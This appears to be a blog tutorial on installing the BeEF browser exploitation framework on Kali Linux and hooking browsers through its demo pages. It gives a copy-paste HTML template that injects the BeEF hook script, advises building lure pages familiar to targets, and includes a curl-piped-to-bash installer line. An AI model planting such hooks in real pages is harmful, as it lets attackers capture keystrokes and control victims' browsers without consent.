There are many tools for hacking and pen-testing Kali Linux. We will also mention one of the best of these tools, which is called BeEF. Note that beEF is not installed by default in Kali Linux, but you can find it in the default repository. Use the apt package manager for installing BeEF. You will then see a web interface open on port 3000 to run the tests. Read our article carefully. This article will teach you the best way to install BeEF on Kali Linux and show you all the installation steps.
BeEF is the short form of “Browser Exploitation Framework” and is an open-source penetration testing tool designed to assess the security of web browsers. This tool is something similar to Metasploit on Kali Linux but focuses on web browsers.
It is primarily used by ethical hackers and security professionals to evaluate the vulnerability of web applications and the security of client-side systems. BeEF allows testers to demonstrate various client-side attacks and assess how well a target system can withstand these attacks. This type of attack works great for social engineering.
Here, you will find out some key features of BeEF:
You can install BeEF manually on your Linux VPS, depending on the Kali Linux version you have. Installing BeEF is straightforward. Here, we will introduce you to the steps to install BeEF:
– The first step is updating the repositories info using the command below:
sudo apt update
Tip: If you were notified that upgrades are available, it is recommended to upgrade the system using the command below:
sudo apt upgrade
Now you can start installing BeEF by the following command:
sudo apt install beef-xss
All the required dependencies to use BeEF will automatically added. This action will bring up a web interface, but you will need so many additional packages. So keep studying!
As you installed the BeEF service, you can start the related service with this command:
sudo beef-xss
Another option is to find BeEF in the main menu:
Now, you can use just one click to start or stop the service.
When you start the service, you can access the BeEF web interface at:
http://localhost:3000
Or, to access from another computer, use the following URL:
http://IP:3000
The login process will be like this:
– Your default user name is “beef” and your password is the one you set while starting the service.
– When you have passed all these steps successfully, you will have a web interface. But we will use the demo so that you get to know more about this tool.
BeEF uses demo pages to familiarize you with the working process of this tool, so it is better to pay attention to this section.
The first page of this tool is very simple. It is a text page with the BeEF logo:
Open the following URL in order to access it in your browser:
http://localhost:3000/demos/basic.html
When you open the page, you’ll see a new line under “Online Browsers” that corresponds to the tab you opened on the desktop.
All actions performed on this page are recorded, and you can see them in the user interface. Below is a screenshot of the tests as an example:
BeEF can detect if the tab is in focus or not. Or find out what we have typed in the form or where we have clicked with the mouse. All actions performed are internal, and no other code is needed to collect information.
BeEF can collect more general data about the user. These data can be:
This tool works in such a way that even if the target only opens the page for a second, its information, such as network, configuration, and the entire system, will be available to you.
After testing from Kali Linux, we will now test the BeEF tool from another computer:
The below screenshot shows that we accessed the page from a Windows computer, IP 192.168.***.**
As you connect the browser to BeEF, you can use the commands available in this tab:
This way, you can control the web browser on the remote computer. In this example, we redirected the browser to a specific URL. You can use many other commands to collect data.
The important thing is to create better pages that look familiar to the intended target. For example, this page can be the entry page for their main program. If you want to create custom pages in BeEF, you should create HTML pages in this directory:
/usr/share/beef-xss/extensions
There you can see the demo folder we have used before with an HTML subfolder.
To be able to connect this page to beef, just create a traditional HTML page and then add the following Java code in the header:
<script> var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>'; document.write(commandModuleStr); </script>
We used the full code, as you can see here. If you desire, you can Copy/paste this code as a template for your new page:
<html>
<head>
<title>Test page infosec</title>
<script>
var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
document.write(commandModuleStr);
</head>
<body>
</body>
</html>
At last, use this command if you want to stop this service:
sudo beef-xss-stop -h
Here are some common problems with BeEF on Kali Linux and their solutions:
1- Difficulty installing BeEF on Kali Linux due to missing dependencies or package conflicts.
Solution:
Ensure that your Kali Linux installation is up to date by running sudo apt update and sudo apt upgrade. Install any missing dependencies or packages as specified in the BeEF documentation or error messages.
2- BeEF may not work with the default Ruby version on Kali Linux.
Solution:
Use a Ruby version manager like RVM to install and manage the required Ruby version. BeEF typically works best with Ruby 2.5 or later. You can install RVM and the necessary Ruby version like this:
curl -sSL https://get.rvm.io | bash -s stable source ~/.rvm/scripts/rvm rvm install 2.7.4 rvm use 2.7.4 --default
3- Database-related errors or connection issues when starting BeEF.
Solution:
Ensure your PostgreSQL or MySQL server is running and properly configured. Update BeEF’s database configuration in the config.yaml file to match your database settings.
4- BeEF may fail to bind to the desired IP address or port.
Solution:
Edit the config.yaml file to specify the correct IP address and port for BeEF to bind to. Ensure that the IP address is reachable and not blocked by firewalls.
BeEF is a Penetration tool that allows you to control and interact with web browsers on remote systems, and can be useful for testing and demonstrating various web vulnerabilities. Here we tried to give you a complete guide to install BeEF on Kali Linux. So follow the steps to have a hassle-free installation process. leave a comment if you encounter any problems. Happy coding!
BlackArch Linux and Kali Linux are two popular penetration testing and ethical hacking distributions...
Tags
Kali Linux is a Debian distribution operating system that comes with many installed tools. This oper...
Tags
